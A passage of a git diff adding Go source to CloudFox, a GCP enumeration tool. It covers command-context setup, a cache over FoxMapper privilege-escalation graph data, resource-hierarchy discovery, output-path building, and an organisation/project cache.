strings.ReplaceAll(flagValue, ",", " ") + fields := strings.Fields(normalized) + + // Deduplicate while preserving order + seen := make(map[string]bool) + result := []string{} + for _, field := range fields { + if !seen[field] { + seen[field] = true + result = append(result, field) + } + } + return result +} + +// ------------------------------ +// InitializeCommandContext - Eliminates duplicate initialization code across commands +// ------------------------------ +// This helper extracts flags, resolves projects and account info. +// +// Usage: +// +// cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_STORAGE_MODULE_NAME) +// if err != nil { +// return // error already logged +// } +func InitializeCommandContext(cmd *cobra.Command, moduleName string) (*CommandContext, error) { + ctx := cmd.Context() + logger := internal.NewLogger() + + // -------------------- Extract flags -------------------- + parentCmd := cmd.Parent() + verbosity, _ := parentCmd.PersistentFlags().GetInt("verbosity") + wrap, _ := parentCmd.PersistentFlags().GetBool("wrap") + outputDirectory, _ := parentCmd.PersistentFlags().GetString("outdir") + format, _ := parentCmd.PersistentFlags().GetString("output") + flatOutput, _ := parentCmd.PersistentFlags().GetBool("flat-output") + + // Default to "all" format if not set (GCP doesn't expose this flag yet) + if format == "" { + format = "all" + } + + // -------------------- Get project IDs from context -------------------- + var projectIDs []string + if value, ok := ctx.Value("projectIDs").([]string); ok && len(value) > 0 { + projectIDs = value + } else { + logger.ErrorM("Could not retrieve projectIDs from context or value is empty", moduleName) + return nil, fmt.Errorf("no project IDs provided") + } + + // -------------------- Get project names from context -------------------- + var projectNames map[string]string + if value, ok := ctx.Value("projectNames").(map[string]string); ok { + projectNames = value + } else { + // Initialize empty map if not provided - modules can still work without names + projectNames = make(map[string]string) + for _, id := range projectIDs { + projectNames[id] = id // fallback to using ID as name + } + } + + // -------------------- Get account from context -------------------- + var account string + if value, ok := ctx.Value("account").(string); ok { + account = value + } else { + logger.ErrorM("Could not retrieve account email from context", moduleName) + // Don't fail - some modules can continue without account info + } + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Resolved %d project(s), account: %s", len(projectIDs), account), moduleName) + } + + // -------------------- Get hierarchy from context (if populated) -------------------- + var hierarchy *ScopeHierarchy + if value, ok := ctx.Value("hierarchy").(*ScopeHierarchy); ok { + hierarchy = value + } + + // -------------------- Build and return context -------------------- + return &CommandContext{ + Ctx: ctx, + Logger: logger, + ProjectIDs: projectIDs, + ProjectNames: projectNames, + Account: account, + Verbosity: verbosity, + WrapTable: wrap, + OutputDirectory: outputDirectory, + Format: format, + Goroutines: 5, // Default concurrency + FlatOutput: flatOutput, + Hierarchy: hierarchy, + }, nil +} diff --git a/internal/gcp/foxmapper_cache.go b/internal/gcp/foxmapper_cache.go new file mode 100755 index 00000000..3308e771 --- /dev/null +++ b/internal/gcp/foxmapper_cache.go @@ -0,0 +1,371 @@ +package gcpinternal + +import ( + "context" + "fmt" + "os" + "path/filepath" + "strings" + "time" + + foxmapperservice "github.com/BishopFox/cloudfox/gcp/services/foxmapperService" +) + +// FoxMapperCache wraps FoxMapperService for use by CloudFox modules +// This provides access to FoxMapper's graph-based privilege escalation analysis +type FoxMapperCache struct { + service *foxmapperservice.FoxMapperService + populated bool + identifier string + loadedPath string + dataAge time.Duration +} + +// NewFoxMapperCache creates a new FoxMapper cache +func NewFoxMapperCache() *FoxMapperCache { + return &FoxMapperCache{ + service: foxmapperservice.New(), + } +} + +// LoadFromOrg loads FoxMapper data for an organization +func (c *FoxMapperCache) LoadFromOrg(orgID string) error { + err := c.service.LoadGraph(orgID, true) + if err != nil { + return err + } + c.populated = true + c.identifier = orgID + return nil +} + +// LoadFromProject loads FoxMapper data for a project +func (c *FoxMapperCache) LoadFromProject(projectID string) error { + err := c.service.LoadGraph(projectID, false) + if err != nil { + return err + } + c.populated = true + c.identifier = projectID + return nil +} + +// LoadFromPath loads FoxMapper data from a custom path +func (c *FoxMapperCache) LoadFromPath(path string) error { + err := c.service.LoadGraphFromPath(path) + if err != nil { + return err + } + c.populated = true + c.identifier = path + return nil +} + +// TryLoad attempts to load FoxMapper data, trying org first then each project +func (c *FoxMapperCache) TryLoad(orgID string, projectIDs []string) error { + // Try org first + if orgID != "" { + if err := c.LoadFromOrg(orgID); err == nil { + return nil + } + } + // Try each project + for _, projectID := range projectIDs { + if err := c.LoadFromProject(projectID); err == nil { + return nil + } + } + return fmt.Errorf("could not load FoxMapper data for org %s or any of %d projects", orgID, len(projectIDs)) +} + +// IsPopulated returns whether the cache has data +func (c *FoxMapperCache) IsPopulated() bool { + return c.populated +} + +// GetAttackSummary returns attack path summary for a principal +func (c *FoxMapperCache) GetAttackSummary(principal string) string { + if !c.populated { + return "run foxmapper" + } + return c.service.GetAttackSummary(principal) +} + +// DoesPrincipalHavePathToAdmin checks if principal can escalate to admin +func (c *FoxMapperCache) DoesPrincipalHavePathToAdmin(principal string) bool { + if !c.populated { + return false + } + return c.service.DoesPrincipalHavePathToAdmin(principal) +} + +// IsPrincipalAdmin checks if principal is admin +func (c *FoxMapperCache) IsPrincipalAdmin(principal string) bool { + if !c.populated { + return false + } + return c.service.IsPrincipalAdmin(principal) +} + +// GetPrivescPaths returns privesc paths for a principal +func (c *FoxMapperCache) GetPrivescPaths(principal string) []foxmapperservice.PrivescPath { + if !c.populated { + return nil + } + return c.service.GetPrivescPaths(principal) +} + +// GetService returns the underlying FoxMapper service +func (c *FoxMapperCache) GetService() *foxmapperservice.FoxMapperService { + return c.service +} + +// GetStats returns statistics about the FoxMapper graph +func (c *FoxMapperCache) GetStats() (totalNodes, adminNodes, nodesWithPrivesc int) { + if !c.populated || c.service == nil { + return 0, 0, 0 + } + summary := c.service.GetPrivescSummary() + totalNodes = summary["total_nodes"].(int) + adminNodes = summary["admin_nodes"].(int) + nodesWithPrivesc = summary["nodes_with_privesc"].(int) + return +} + +// GetIdentifier returns the org/project ID this cache was loaded for +func (c *FoxMapperCache) GetIdentifier() string { + return c.identifier +} + +// GetDataAge returns how old the FoxMapper data is +func (c *FoxMapperCache) GetDataAge() time.Duration { + return c.dataAge +} + +// GetDataAgeDays returns the age of FoxMapper data in days +func (c *FoxMapperCache) GetDataAgeDays() int { + return int(c.dataAge.Hours() / 24) +} + +// SetLoadedPath sets the path and calculates data age from file modification time +func (c *FoxMapperCache) SetLoadedPath(path string) { + c.loadedPath = path + // Try to get the modification time of the nodes.json file + nodesPath := filepath.Join(path, "graph", "nodes.json") + if info, err := os.Stat(nodesPath); err == nil { + c.dataAge = time.Since(info.ModTime()) + } +} + +// HasPrivesc checks if a service account has privilege escalation potential +func (c *FoxMapperCache) HasPrivesc(serviceAccount string) (bool, string) { + if !c.populated { + return false, "" + } + + node := c.service.GetNode(serviceAccount) + if node == nil { + return false, "" + } + + if node.IsAdmin { + return true, fmt.Sprintf("Admin (%s)", node.AdminLevel) + } + + if node.PathToAdmin { + paths := c.service.GetPrivescPaths(serviceAccount) + if len(paths) > 0 { + conf := paths[0].Confidence + if conf != "" && conf != "high" { + return true, fmt.Sprintf("Privesc (%d hops, %s confidence)", paths[0].HopCount, conf) + } + return true, fmt.Sprintf("Privesc (%d hops)", paths[0].HopCount) + } + return true, "Privesc" + } + + return false, "" +} + +// GetAdminStatus returns the admin status for a principal from FoxMapper data +// Returns: isAdmin (bool), adminLevel (string: "Org", "Folder", "Project", or "") +func (c *FoxMapperCache) GetAdminStatus(principal string) (bool, string) { + if !c.populated { + return false, "" + } + + // Clean the principal - remove prefixes if present + cleanPrincipal := principal + if strings.HasPrefix(principal, "serviceAccount:") { + cleanPrincipal = strings.TrimPrefix(principal, "serviceAccount:") + } else if strings.HasPrefix(principal, "user:") { + cleanPrincipal = strings.TrimPrefix(principal, "user:") + } else if strings.HasPrefix(principal, "group:") { + cleanPrincipal = strings.TrimPrefix(principal, "group:") + } + + node := c.service.GetNode(cleanPrincipal) + if node == nil { + return false, "" + } + + if node.IsAdmin { + level := node.AdminLevel + // Capitalize for display + switch level { + case "org": + return true, "Org" + case "folder": + return true, "Folder" + case "project": + return true, "Project" + default: + if level == "" { + return true, "Project" // Default to project if not specified + } + return true, level + } + } + + return false, "" +} + +// Context key for FoxMapper cache +type foxMapperCacheKey struct{} + +// GetFoxMapperCacheFromContext retrieves the FoxMapper cache from context +func GetFoxMapperCacheFromContext(ctx context.Context) *FoxMapperCache { + if cache, ok := ctx.Value(foxMapperCacheKey{}).(*FoxMapperCache); ok { + return cache + } + return nil +} + +// SetFoxMapperCacheInContext returns a new context with the FoxMapper cache +func SetFoxMapperCacheInContext(ctx context.Context, cache *FoxMapperCache) context.Context { + return context.WithValue(ctx, foxMapperCacheKey{}, cache) +} + +// TryLoadFoxMapper attempts to find and load FoxMapper data +// Returns the loaded cache or nil if not found +// If org-level graph exists, uses that. Otherwise, loads and merges all project graphs. +func TryLoadFoxMapper(orgID string, projectIDs []string) *FoxMapperCache { + cache := NewFoxMapperCache() + + // Try org first - if it exists, it should contain all projects + if orgID != "" { + if path, err := foxmapperservice.FindFoxMapperData(orgID, true); err == nil { + if err := cache.LoadFromOrg(orgID); err == nil { + cache.SetLoadedPath(path) + return cache + } + } + } + + // No org-level graph - try to load and merge all project graphs + loadedCount := 0 + var firstPath string + for _, projectID := range projectIDs { + if loadedCount == 0 { + // First project - load normally + if path, err := foxmapperservice.FindFoxMapperData(projectID, false); err == nil { + if err := cache.LoadFromProject(projectID); err == nil { + firstPath = path + loadedCount++ + } + } + } else { + // Subsequent projects - merge into existing graph + path, err := foxmapperservice.FindFoxMapperData(projectID, false) + if err == nil { + if err := cache.service.MergeGraphFromPath(path); err == nil { + loadedCount++ + } + } + } + } + + // If we loaded multiple projects, rebuild the graph + if loadedCount > 1 { + cache.service.RebuildAfterMerge() + cache.identifier = fmt.Sprintf("%d projects", loadedCount) + } + + if loadedCount > 0 { + if firstPath != "" { + cache.SetLoadedPath(firstPath) + } + return cache + } + + return nil +} + +// FindFoxMapperData searches for FoxMapper data and returns the path if found +func FindFoxMapperData(identifier string, isOrg bool) (string, error) { + return foxmapperservice.FindFoxMapperData(identifier, isOrg) +} + +// AttackSummaryProvider is an interface that FoxMapperCache implements +// This allows modules to use the cache interchangeably +type AttackSummaryProvider interface { + IsPopulated() bool + GetAttackSummary(principal string) string +} + +// GetBestAttackSummary returns attack summary from FoxMapper +func GetBestAttackSummary(ctx context.Context, principal string) string { + if fmCache := GetFoxMapperCacheFromContext(ctx); fmCache != nil && fmCache.IsPopulated() { + return fmCache.GetAttackSummary(principal) + } + return "run foxmapper" +} + +// All-checks mode context helper +type allChecksModeKey struct{} + +// SetAllChecksMode sets a flag in context indicating all-checks mode is active +func SetAllChecksMode(ctx context.Context, enabled bool) context.Context { + return context.WithValue(ctx, allChecksModeKey{}, enabled) +} + +// GetAllChecksMode checks if all-checks mode is active in context +func GetAllChecksMode(ctx context.Context) bool { + if enabled, ok := ctx.Value(allChecksModeKey{}).(bool); ok { + return enabled + } + return false +} + +// GetAttackSummaryFromCaches returns attack summary using FoxMapper cache +// The second parameter is kept for backward compatibility but is ignored +func GetAttackSummaryFromCaches(foxMapperCache *FoxMapperCache, _ interface{}, principal string) string { + // Clean the principal - remove prefixes if present + cleanPrincipal := principal + if strings.HasPrefix(principal, "serviceAccount:") { + cleanPrincipal = strings.TrimPrefix(principal, "serviceAccount:") + } else if strings.HasPrefix(principal, "user:") { + cleanPrincipal = strings.TrimPrefix(principal, "user:") + } + + // Use FoxMapper for graph-based analysis + if foxMapperCache != nil && foxMapperCache.IsPopulated() { + return foxMapperCache.GetAttackSummary(cleanPrincipal) + } + + return "run foxmapper" +} + +// GetAdminStatusFromCache returns admin status from FoxMapper cache +// Returns the admin level (Org/Folder/Project) if admin, empty string otherwise +func GetAdminStatusFromCache(foxMapperCache *FoxMapperCache, principal string) string { + if foxMapperCache == nil || !foxMapperCache.IsPopulated() { + return "" + } + + isAdmin, level := foxMapperCache.GetAdminStatus(principal) + if isAdmin { + return level + } + return "" +} diff --git a/internal/gcp/hierarchy.go b/internal/gcp/hierarchy.go new file mode 100644 index 00000000..8280ad8c --- /dev/null +++ b/internal/gcp/hierarchy.go @@ -0,0 +1,472 @@ +package gcpinternal + +import ( + "path/filepath" + "regexp" + "strings" +) + +// ------------------------------ +// Scope Hierarchy Types +// ------------------------------ + +// ScopeHierarchy represents the discovered GCP resource hierarchy +type ScopeHierarchy struct { + Organizations []OrgScope // Organizations (may be empty if no org access) + Folders []FolderScope // Folders (may be empty) + Projects []ProjectScope // All projects being processed + StandaloneProjs []string // Project IDs not belonging to any known org +} + +// OrgScope represents an organization in the hierarchy +type OrgScope struct { + ID string // Numeric org ID (e.g., "672370982061") + DisplayName string // Org display name (e.g., "acme.com") - may be empty if inaccessible + Accessible bool // Whether we can enumerate org-level resources + FolderIDs []string // Folder IDs directly under this org + ProjectIDs []string // Project IDs under this org (directly or via folders) +} + +// FolderScope represents a folder in the hierarchy +type FolderScope struct { + ID string // Folder ID + DisplayName string // Folder display name + ParentType string // "organization" or "folder" + ParentID string // Parent org or folder ID + ProjectIDs []string // Project IDs directly under this folder + Depth int // Depth in hierarchy (0 = direct child of org) +} + +// ProjectScope represents a project in the hierarchy +type ProjectScope struct { + ID string // Project ID + Name string // Project display name + OrgID string // Parent org ID (empty if standalone/unknown) + FolderID string // Direct parent folder ID (empty if directly under org) +} + +// ------------------------------ +// Ancestry Node (for building hierarchy) +// ------------------------------ + +// AncestryNode represents a node in the resource hierarchy ancestry +type AncestryNode struct { + Type string // organization, folder, project + ID string + DisplayName string + Parent string + Depth int +} + +// OrganizationData represents organization info for hierarchy building +type OrganizationData struct { + Name string // organizations/ORGID + DisplayName string +} + +// ------------------------------ +// Hierarchy Builder Interface +// ------------------------------ + +// HierarchyDataProvider interface allows fetching hierarchy data without import cycles +type HierarchyDataProvider interface { + GetProjectAncestry(projectID string) ([]AncestryNode, error) + SearchOrganizations() ([]OrganizationData, error) +} + +// ------------------------------ +// Hierarchy Detection +// ------------------------------ + +// BuildScopeHierarchy analyzes the given projects and discovers their organizational hierarchy. +// It uses the provided HierarchyDataProvider to fetch data without import cycles. +// It attempts to: +// 1. Get org ID from project ancestry for each project +// 2. Get org display names (requires org-level permissions) +// 3. Get folder information (from ancestry data) +// 4. Identify standalone projects (no org association) +func BuildScopeHierarchy(projectIDs []string, provider HierarchyDataProvider) (*ScopeHierarchy, error) { + hierarchy := &ScopeHierarchy{ + Organizations: []OrgScope{}, + Folders: []FolderScope{}, + Projects: []ProjectScope{}, + StandaloneProjs: []string{}, + } + + if len(projectIDs) == 0 { + return hierarchy, nil + } + + // Maps to track relationships + orgProjects := make(map[string][]string) // orgID -> projectIDs + projectToOrg := make(map[string]string) // projectID -> orgID + projectToFolder := make(map[string]string) // projectID -> folderID + folderToOrg := make(map[string]string) // folderID -> orgID + folderInfo := make(map[string]FolderScope) // folderID -> FolderScope + projectNames := make(map[string]string) // projectID -> displayName + + // Step 1: Get project ancestry for each project to discover org/folder relationships + for _, projectID := range projectIDs { + ancestry, err := provider.GetProjectAncestry(projectID) + if err != nil { + // Can't get ancestry - mark as standalone for now + hierarchy.StandaloneProjs = append(hierarchy.StandaloneProjs, projectID) + continue + } + + // If ancestry is empty, mark as standalone + if len(ancestry) == 0 { + hierarchy.StandaloneProjs = append(hierarchy.StandaloneProjs, projectID) + continue + } + + // Parse ancestry to find org and folder + // Note: ancestry is ordered from org -> folder(s) -> project + var foundOrg, foundFolder string + var lastFolderID string + for _, node := range ancestry { + switch node.Type { + case "organization": + foundOrg = node.ID + case "folder": + lastFolderID = node.ID + folderToOrg[node.ID] = foundOrg + if _, exists := folderInfo[node.ID]; !exists { + folderInfo[node.ID] = FolderScope{ + ID: node.ID, + DisplayName: node.DisplayName, + ParentType: node.Type, + ParentID: "", // Will be filled later + Depth: node.Depth, + } + } + case "project": + projectNames[node.ID] = node.DisplayName + // The folder directly containing this project is the last folder we saw + if lastFolderID != "" { + foundFolder = lastFolderID + } + } + } + + if foundOrg != "" { + projectToOrg[projectID] = foundOrg + orgProjects[foundOrg] = append(orgProjects[foundOrg], projectID) + } else { + hierarchy.StandaloneProjs = append(hierarchy.StandaloneProjs, projectID) + } + + if foundFolder != "" { + projectToFolder[projectID] = foundFolder + } + } + + // Step 2: Try to get org display names (requires resourcemanager.organizations.get) + orgDisplayNames := make(map[string]string) + orgAccessible := make(map[string]bool) + + orgs, err := provider.SearchOrganizations() + if err == nil { + for _, org := range orgs { + orgID := strings.TrimPrefix(org.Name, "organizations/") + orgDisplayNames[orgID] = org.DisplayName + orgAccessible[orgID] = true + } + } + + // Step 3: Build organization scopes + for orgID, projIDs := range orgProjects { + orgScope := OrgScope{ + ID: orgID, + DisplayName: orgDisplayNames[orgID], // May be empty + Accessible: orgAccessible[orgID], + ProjectIDs: projIDs, + FolderIDs: []string{}, + } + + // Collect folders for this org + for folderID, fOrgID := range folderToOrg { + if fOrgID == orgID { + orgScope.FolderIDs = append(orgScope.FolderIDs, folderID) + } + } + + hierarchy.Organizations = append(hierarchy.Organizations, orgScope) + } + + // Step 4: Build folder scopes + for folderID, fScope := range folderInfo { + // Find projects directly under this folder + for projID, fID := range projectToFolder { + if fID == folderID { + fScope.ProjectIDs = append(fScope.ProjectIDs, projID) + } + } + hierarchy.Folders = append(hierarchy.Folders, fScope) + } + + // Step 5: Build project scopes + for _, projectID := range projectIDs { + pScope := ProjectScope{ + ID: projectID, + Name: projectNames[projectID], + OrgID: projectToOrg[projectID], + FolderID: projectToFolder[projectID], + } + if pScope.Name == "" { + pScope.Name = projectID // Fallback to ID + } + hierarchy.Projects = append(hierarchy.Projects, pScope) + } + + return hierarchy, nil +} + +// ------------------------------ +// Path Building Functions +// ------------------------------ + +// GetOrgIdentifier returns the best identifier for an org (display name or ID) +func (h *ScopeHierarchy) GetOrgIdentifier(orgID string) string { + for _, org := range h.Organizations { + if org.ID == orgID { + if org.DisplayName != "" { + return org.DisplayName + } + return org.ID + } + } + return orgID +} + +// GetProjectOrg returns the org ID for a project, or empty string if standalone +func (h *ScopeHierarchy) GetProjectOrg(projectID string) string { + for _, proj := range h.Projects { + if proj.ID == projectID { + return proj.OrgID + } + } + return "" +} + +// GetProjectName returns the display name for a project +func (h *ScopeHierarchy) GetProjectName(projectID string) string { + for _, proj := range h.Projects { + if proj.ID == projectID { + if proj.Name != "" { + return proj.Name + } + return proj.ID + } + } + return projectID +} + +// IsStandalone returns true if the project has no org association +func (h *ScopeHierarchy) IsStandalone(projectID string) bool { + for _, standaloneID := range h.StandaloneProjs { + if standaloneID == projectID { + return true + } + } + return false +} + +// HasOrgAccess returns true if at least one org is accessible +func (h *ScopeHierarchy) HasOrgAccess() bool { + for _, org := range h.Organizations { + if org.Accessible { + return true + } + } + return false +} + +// ------------------------------ +// Output Path Builder +// ------------------------------ + +// sanitizePathComponent removes or replaces invalid characters for directory names +func sanitizePathComponent(name string) string { + // Replace characters invalid on Windows/Linux + re := regexp.MustCompile(`[<>:"/\\|?*\x00-\x1f]`) + sanitized := re.ReplaceAllString(name, "_") + + // Trim spaces and dots from ends (Windows restriction) + sanitized = strings.TrimRight(sanitized, ". ") + sanitized = strings.TrimLeft(sanitized, ". ") + + // Limit length + if len(sanitized) > 100 { + sanitized = sanitized[:100] + } + + if sanitized == "" { + sanitized = "unknown" + } + + return sanitized +} + +// BuildHierarchicalPath constructs the output path for hierarchical output. +// Parameters: +// - baseDir: Base output directory (e.g., ~/.cloudfox/cloudfox-output) +// - principal: Authenticated account email +// - hierarchy: The detected scope hierarchy +// - scopeType: "organization", "folder", or "project" +// - scopeID: The ID of the scope (orgID, folderID, or projectID) +// +// Returns paths like: +// - Org level: baseDir/cloudfox-output/gcp/principal/[O]org-name/ +// - Folder level: baseDir/cloudfox-output/gcp/principal/[O]org-name/[F]folder-name/ +// - Project under org: baseDir/cloudfox-output/gcp/principal/[O]org-name/[P]project-name/ +// - Project under folder: baseDir/cloudfox-output/gcp/principal/[O]org-name/[F]folder/[P]project/ +// - Standalone project: baseDir/cloudfox-output/gcp/principal/[P]project-name/ +func BuildHierarchicalPath( + baseDir string, + principal string, + hierarchy *ScopeHierarchy, + scopeType string, + scopeID string, +) string { + base := filepath.Join(baseDir, "cloudfox-output", "gcp", sanitizePathComponent(principal)) + + switch scopeType { + case "organization": + orgName := hierarchy.GetOrgIdentifier(scopeID) + return filepath.Join(base, "[O]"+sanitizePathComponent(orgName)) + + case "folder": + // Find the folder and its parent org + var folder *FolderScope + for i := range hierarchy.Folders { + if hierarchy.Folders[i].ID == scopeID { + folder = &hierarchy.Folders[i] + break + } + } + + if folder == nil { + // Fallback - just use folder ID + return filepath.Join(base, "[F]"+sanitizePathComponent(scopeID)) + } + + // Get org path first + orgID := "" + for oID, fIDs := range getOrgFolderMap(hierarchy) { + for _, fID := range fIDs { + if fID == scopeID { + orgID = oID + break + } + } + } + + if orgID != "" { + orgName := hierarchy.GetOrgIdentifier(orgID) + folderName := folder.DisplayName + if folderName == "" { + folderName = folder.ID + } + return filepath.Join(base, "[O]"+sanitizePathComponent(orgName), "[F]"+sanitizePathComponent(folderName)) + } + + // No org found - just folder + folderName := folder.DisplayName + if folderName == "" { + folderName = folder.ID + } + return filepath.Join(base, "[F]"+sanitizePathComponent(folderName)) + + case "project": + projectName := hierarchy.GetProjectName(scopeID) + orgID := hierarchy.GetProjectOrg(scopeID) + + // Standalone project + if orgID == "" || hierarchy.IsStandalone(scopeID) { + return filepath.Join(base, "[P]"+sanitizePathComponent(projectName)) + } + + // Project under org + orgName := hierarchy.GetOrgIdentifier(orgID) + + // Check if project is under a folder + var folderID string + for _, proj := range hierarchy.Projects { + if proj.ID == scopeID && proj.FolderID != "" { + folderID = proj.FolderID + break + } + } + + if folderID != "" { + // Project under folder under org + var folderName string + for _, f := range hierarchy.Folders { + if f.ID == folderID { + folderName = f.DisplayName + if folderName == "" { + folderName = f.ID + } + break + } + } + return filepath.Join(base, "[O]"+sanitizePathComponent(orgName), "[F]"+sanitizePathComponent(folderName), "[P]"+sanitizePathComponent(projectName)) + } + + // Project directly under org + return filepath.Join(base, "[O]"+sanitizePathComponent(orgName), "[P]"+sanitizePathComponent(projectName)) + + default: + // Unknown scope type - use as-is + return filepath.Join(base, sanitizePathComponent(scopeID)) + } +} + +// getOrgFolderMap builds a map of orgID -> folderIDs +func getOrgFolderMap(hierarchy *ScopeHierarchy) map[string][]string { + result := make(map[string][]string) + for _, org := range hierarchy.Organizations { + result[org.ID] = org.FolderIDs + } + return result +} + +// ------------------------------ +// Flat Output Path (Legacy Mode) +// ------------------------------ + +// BuildFlatPath constructs the legacy flat output path (for --flat-output mode) +// All data goes to a single folder based on the "highest" scope available +func BuildFlatPath( + baseDir string, + principal string, + hierarchy *ScopeHierarchy, +) string { + base := filepath.Join(baseDir, "cloudfox-output", "gcp", sanitizePathComponent(principal)) + + // If we have org access, use org-level folder + if len(hierarchy.Organizations) > 0 { + // Use first org (or combine if multiple) + if len(hierarchy.Organizations) == 1 { + orgName := hierarchy.GetOrgIdentifier(hierarchy.Organizations[0].ID) + return filepath.Join(base, "[O]"+sanitizePathComponent(orgName)) + } + // Multiple orgs - use combined name + orgName := hierarchy.GetOrgIdentifier(hierarchy.Organizations[0].ID) + return filepath.Join(base, "[O]"+sanitizePathComponent(orgName)+"_and_"+ + sanitizePathComponent(string(rune(len(hierarchy.Organizations)-1)))+"_more") + } + + // No org - use project-level + if len(hierarchy.Projects) > 0 { + if len(hierarchy.Projects) == 1 { + return filepath.Join(base, "[P]"+sanitizePathComponent(hierarchy.Projects[0].Name)) + } + // Multiple projects - use combined name + return filepath.Join(base, "[P]"+sanitizePathComponent(hierarchy.Projects[0].Name)+ + "_and_"+sanitizePathComponent(string(rune(len(hierarchy.Projects)-1)))+"_more") + } + + return filepath.Join(base, "unknown-scope") +} diff --git a/internal/gcp/org_cache.go b/internal/gcp/org_cache.go new file mode 100755 index 00000000..25b71dc0 --- /dev/null +++ b/internal/gcp/org_cache.go @@ -0,0 +1,334 @@ +package gcpinternal + +import ( + "context" + "sync" +) + +// OrgCache holds cached organization, folder, and project data +// This allows modules to access full org enumeration without re-querying +type OrgCache struct { + // All accessible organizations + Organizations []CachedOrganization + + // All accessible folders + Folders []CachedFolder + + // All accessible projects (full enumeration) + AllProjects []CachedProject + + // Quick lookups + ProjectByID map[string]*CachedProject + ProjectByNumber map[string]*CachedProject + FolderByID map[string]*CachedFolder + OrgByID map[string]*CachedOrganization + + // Populated indicates whether the cache has been populated + Populated bool + + mu sync.RWMutex +} + +// CachedOrganization represents cached org info +type CachedOrganization struct { + ID string // Numeric org ID + Name string // organizations/ORGID + DisplayName string + DirectoryID string // Cloud Identity directory customer ID + State string // ACTIVE, DELETE_REQUESTED, etc. +} + +// CachedFolder represents cached folder info +type CachedFolder struct { + ID string // Folder ID + Name string // folders/FOLDERID + DisplayName string + Parent string // Parent org or folder + State string // ACTIVE, DELETE_REQUESTED, etc. +} + +// CachedProject represents cached project info +type CachedProject struct { + ID string // Project ID (e.g. "my-project") + Number string // Project number (e.g. "123456789") + Name string // projects/PROJECT_NUMBER + DisplayName string + Parent string // Parent org or folder + State string // ACTIVE, DELETE_REQUESTED, etc. +} + +// NewOrgCache creates a new empty org cache +func NewOrgCache() *OrgCache { + return &OrgCache{ + Organizations: []CachedOrganization{}, + Folders: []CachedFolder{}, + AllProjects: []CachedProject{}, + ProjectByID: make(map[string]*CachedProject), + ProjectByNumber: make(map[string]*CachedProject), + FolderByID: make(map[string]*CachedFolder), + OrgByID: make(map[string]*CachedOrganization), + Populated: false, + } +} + +// AddOrganization adds an organization to the cache +func (c *OrgCache) AddOrganization(org CachedOrganization) { + c.mu.Lock() + defer c.mu.Unlock() + + c.Organizations = append(c.Organizations, org) + c.OrgByID[org.ID] = &c.Organizations[len(c.Organizations)-1] +} + +// AddFolder adds a folder to the cache +func (c *OrgCache) AddFolder(folder CachedFolder) { + c.mu.Lock() + defer c.mu.Unlock() + + c.Folders = append(c.Folders, folder) + c.FolderByID[folder.ID] = &c.Folders[len(c.Folders)-1] +} + +// AddProject adds a project to the cache +func (c *OrgCache) AddProject(project CachedProject) { + c.mu.Lock() + defer c.mu.Unlock() + + c.AllProjects = append(c.AllProjects, project) + ptr := &c.AllProjects[len(c.AllProjects)-1] + c.ProjectByID[project.ID] = ptr + if project.Number != "" { + c.ProjectByNumber[project.Number] = ptr + } +} + +// MarkPopulated marks the cache as populated +func (c *OrgCache) MarkPopulated() { + c.mu.Lock() + defer c.mu.Unlock() + c.Populated = true +} + +// IsPopulated returns whether the cache has been populated +func (c *OrgCache) IsPopulated() bool { + c.mu.RLock() + defer c.mu.RUnlock() + return c.Populated +} + +// GetAllProjectIDs returns all project IDs in the cache +func (c *OrgCache) GetAllProjectIDs() []string { + c.mu.RLock() + defer c.mu.RUnlock() + + ids := make([]string, len(c.AllProjects)) + for i, p := range c.AllProjects { + ids[i] = p.ID + } + return ids +} + +// GetActiveProjectIDs returns only active project IDs +func (c *OrgCache) GetActiveProjectIDs() []string { + c.mu.RLock() + defer c.mu.RUnlock() + + var ids []string + for _, p := range c.AllProjects { + if p.State == "ACTIVE" { + ids = append(ids, p.ID) + } + } + return ids +} + +// GetProject returns a project by ID +func (c *OrgCache) GetProject(projectID string) *CachedProject { + c.mu.RLock() + defer c.mu.RUnlock() + return c.ProjectByID[projectID] +} + +// GetProjectIDByNumber returns the project ID for a given project number. +// Returns empty string if not found. +func (c *OrgCache) GetProjectIDByNumber(number string) string { + c.mu.RLock() + defer c.mu.RUnlock() + if p, ok := c.ProjectByNumber[number]; ok { + return p.ID + } + return "" +} + +// GetFolder returns a folder by ID +func (c *OrgCache) GetFolder(folderID string) *CachedFolder { + c.mu.RLock() + defer c.mu.RUnlock() + return c.FolderByID[folderID] +} + +// GetOrganization returns an organization by ID +func (c *OrgCache) GetOrganization(orgID string) *CachedOrganization { + c.mu.RLock() + defer c.mu.RUnlock() + return c.OrgByID[orgID] +} + +// GetStats returns statistics about the cache +func (c *OrgCache) GetStats() (orgs, folders, projects int) { + c.mu.RLock() + defer c.mu.RUnlock() + return len(c.Organizations), len(c.Folders), len(c.AllProjects) +} + +// HasProject returns true if the project ID exists in the org cache +func (c *OrgCache) HasProject(projectID string) bool { + c.mu.RLock() + defer c.mu.RUnlock() + _, exists := c.ProjectByID[projectID] + return exists +} + +// GetProjectScope returns the scope of a project relative to the org cache: +// - "Internal" if the project is in the cache (part of enumerated org) +// - "External" if the cache is populated but project is not in it +// - "Unknown" if the cache is not populated +func (c *OrgCache) GetProjectScope(projectID string) string { + c.mu.RLock() + defer c.mu.RUnlock() + + if !c.Populated { + return "Unknown" + } + + if _, exists := c.ProjectByID[projectID]; exists { + return "Internal" + } + return "External" +} + +// GetProjectsInOrg returns all project IDs belonging to an organization +func (c *OrgCache) GetProjectsInOrg(orgID string) []string { + c.mu.RLock() + defer c.mu.RUnlock() + + var ids []string + orgPrefix := "organizations/" + orgID + + // Direct children of org + for _, p := range c.AllProjects { + if p.Parent == orgPrefix { + ids = append(ids, p.ID) + } + } + + // Children of folders in this org (simplified - doesn't handle nested folders) + for _, f := range c.Folders { + if f.Parent == orgPrefix { + folderPrefix := "folders/" + f.ID + for _, p := range c.AllProjects { + if p.Parent == folderPrefix { + ids = append(ids, p.ID) + } + } + } + } + + return ids +} + +// GetProjectAncestorFolders returns all folder IDs in the ancestry path for a project. +// This walks up from the project's parent through all nested folders. +func (c *OrgCache) GetProjectAncestorFolders(projectID string) []string { + c.mu.RLock() + defer c.mu.RUnlock() + + project := c.ProjectByID[projectID] + if project == nil { + return nil + } + + var folderIDs []string + currentParent := project.Parent + + // Walk up the folder chain + for { + if currentParent == "" { + break + } + + // Check if parent is a folder + if len(currentParent) > 8 && currentParent[:8] == "folders/" { + folderID := currentParent[8:] + 